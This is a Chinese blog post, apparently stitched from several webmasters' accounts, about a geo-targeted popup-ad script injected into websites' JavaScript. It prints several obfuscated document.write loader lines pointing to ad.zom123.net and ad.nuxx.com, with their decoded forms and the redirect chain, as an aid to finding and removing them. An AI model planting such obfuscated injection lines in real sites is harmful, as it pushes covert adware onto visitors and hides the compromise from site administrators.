http://www.baidu.com/s?tn=baiduhome_pg&bs=form+action&f=8&rsv_bp=1&rsv_spt=1&wd=ad.zom123.net%2Fip.asp&rsv_n=2&inputT=719
超级隐蔽的挂木马广告手段需要站长提高警惕
日下黑客猖獗,很多网站存在安全隐患,被人钻了空子轻则挂黑链挂马,重者被别人提权拿下服务器权限,这些都是可以看到的问题,可如果黑客挂了比较“聪明”的代码,那么一般人是很难发现问题的。
前不久济宁网站建设公司易联网络的一位客户就来诉苦了,他说以前在别的网络公司做过一个网站,但是这个网站被客户反映经常弹出广告窗口,而且内容低下很是反感,而很奇怪的是自己打开网站就没有弹出广告窗口来,找了原来做网站的公司,他们说他们也没看到有弹出窗口,因此也无法解决这个问题,听到这里我也觉得挺有意思,我在想或许是客户的电脑中了木马病毒之类都会有弹窗了吧,不过不能这么多客户都有中毒,于是我先上了我在济南的服务器,打开这个朋友的网站,的确在服务器上也发现了弹出广告,看来问题的确存在,我又在自己电脑试了试,果然不出弹出广告,于是查看网页代码,并没有可疑黑链或者垃圾代码,通常挂马不是在模板就是JS里,于是到JS文件去查看,果然有异常,一行不明代码映入眼中:document.write("<s"+"cript src='http://a"+"d.z"+"om"+"123"+".n"+"et/i"+"p.asp?l"+"oc=yourcity'><\/s"+"cript>");这个代码看着有点不正常吧,其实,这是服务器可编译的写法,编译以后执行的就是<script src='http://ad.zom123.net/ip.asp?loc=yourcity'></script>,可能不懂代码的人也看不出来,其实他这个是调用了外部一个判断函数,这个代码首选返回“yourcity”的信息,当访客的地址是哪个城市,这个广告就会自动屏蔽这个地区所在客户的广告,如果是yourcity变成chongqing,<script src='http://ad.zom123.net/ip.asp?loc=chongqing'></script>加入这行代码,重庆地区的访客就不会显示广告,其它除了重庆地区以外的人都会有弹出广告了,真可怕啊,大家不禁会问,为什么要这样写代码?其实是黑客研究了这个网站的管理员或者公司所在的地区,然后就把屏蔽代码加进去屏蔽管理员所在的广告,这样管理员或者在当地的公司就不会发现网站被人修改过了,只要访客不反映,这个问题是永远不会被发现的。
通过删除JS里的这行代码,通过几天的测试,网站再没有弹出广告来,客户赞叹不已!
最近老是有人反映小站有弹窗,可我打开的时候没问题。难道被人挂马了?下班后开始检查网站:上FTP看文件修改时间(没异常)---检查外链情况(没异常)---最后只好来看代码,同时打开百度统计里的网站速度诊断测试一下新空间速度。几分钟开的我眼疼,打开网速测试发现问题了:网站首页多了一条JS请求
<script src='http://ad.zom123.net/ip.asp?loc=yourcity'></script>
于是就到文件里找,愣是没找到。
不死心打开所有的JS文件来看(还好不多),终于让我逮到了:
document.write("<\163cr"+"ipt src='http://\141d."+"\172om"+"12"+"\63"+".net"+"/ip."+"asp?loc"+"=zibo'><\/scr"+"ipt>");
真无语了,分解+加密,这AD太强了。注意开底色黄色的文字,这弹窗屏蔽你当前城市的IP,所以你看不到弹窗的。
DELETE~
目前没有什么好的办法来防止这种挂JS代码,大家如果遇到这种情况的话一定要仔细检查一下自己网站的JS文件。要是网站里的JS文件太多,请搜索document.write来逐一排查。
黑客达到这种境界不容易
document.write("<s"+"cript src='http://a"+"d.n"+"uxx"+".c"+
"om/i"+"p.asp?l"+"oc=guangzhou|xinyang'><\/s"+"cript>");
这个真实网址是:ad. nuxx. com 这个网址远程控制。
同一IP,24小时内只弹出一次,够强。
这行JS代码加到discuz7.0,uchome2.0,ecms5.1程序中,而且对原网站运行不产生什么影响,就是弹出欺骗广告。
其实感叹这个黑客真是强:
1.加代码,没有破坏我的网站数据和程序,一个网站只加一个JS,而且全部都受影响。证明其人精通DISCUZ.UCHOME, ECMS程序。且有一点点道德,不像其它的自动挂马,搞得我程序全乱。
2.挂的隐蔽,不在网上查询,根本找不到所挂网址的真实地址。
3.经查询,此域名注册所有人写为 广州xx软件。电话留个长安医院的电话。够强。
此木马加的代码那是相当高明,它会检查管理员登录IP所在地,只有管理员IP所在地不会出现弹窗,其他地方都有。代码如下:
document.write ('']http://\x61d.'+'\x7Aom'+'12'+'\x33'+'.net'+'/ip.'+'asp?loc'+'=shanghai|jiaxing">'[/url]);
解码后得出:
http:// ad. zom123.net/ip.asp?loc=shanghai|jiaxing
此代码隐藏在某个js里了。(如果换个关键字:'\x33'+'.net'+'/ip.'+'asp 肯定就找到了,因为 js 里放的是穿了马甲的,它把123都拆开来了,小样,太狡猾了)。如果用没有翻译的代码也找不到木马的朋友,那肯定是又换马甲了。各位网址朋友可要小心注意站点安全。
通过Firefox浏览器后退的功能发现打开从SEO学堂经过了以下几次跳转后到弹窗:
- http://www.seoxuetang.com/
- http://ad.zom123.net/?action=pop
- http://www.wa66.com/
- http://www.wa66.com/index.asp
- http://ad.18lehu.com/348/index.html?callid=0041316597725307177517951240&adid=2476&ucode=8&subucode=20113&xt=1316597725&xs=7d3b8c5f38b3f4faf76c8346f6991cde&adtitle=%222011\u7537\u4eba\u5fc5\u73a9\u7684\u6e38\u620f%22
如果你没注意的话怎么也不会想到经过了上面这么多次跳转后到了http://ad.18lehu.com/这个真正放弹窗的网站。即然找到了开始跳转的网址是http://ad.zom123.net/?action=pop,那么在网站代码中仔细找就是了,但如果真那么容易找的话SEO学堂网站的站长和他的空间商就不会找几天都找不出原因来了。经过本人逐步分析查检到了可疑对象:并成功清除弹窗问题,如你也有遇到类似问题可以通过下面的联系我们找到联系方式找我来帮忙处理。哈....
说明:1、此弹窗隐藏非常高,并且针对地区,服务商屏蔽弹窗,如网站站上所在处根本没有弹窗,只有其它地方才有。
2、一个IP或电脑24小时或一周内只弹窗一次,让人难以注意到。因为一个弹窗谁也不会太留意。
2、一个IP或电脑24小时或一周内只弹窗一次,让人难以注意到。因为一个弹窗谁也不会太留意。
没有评论:
发表评论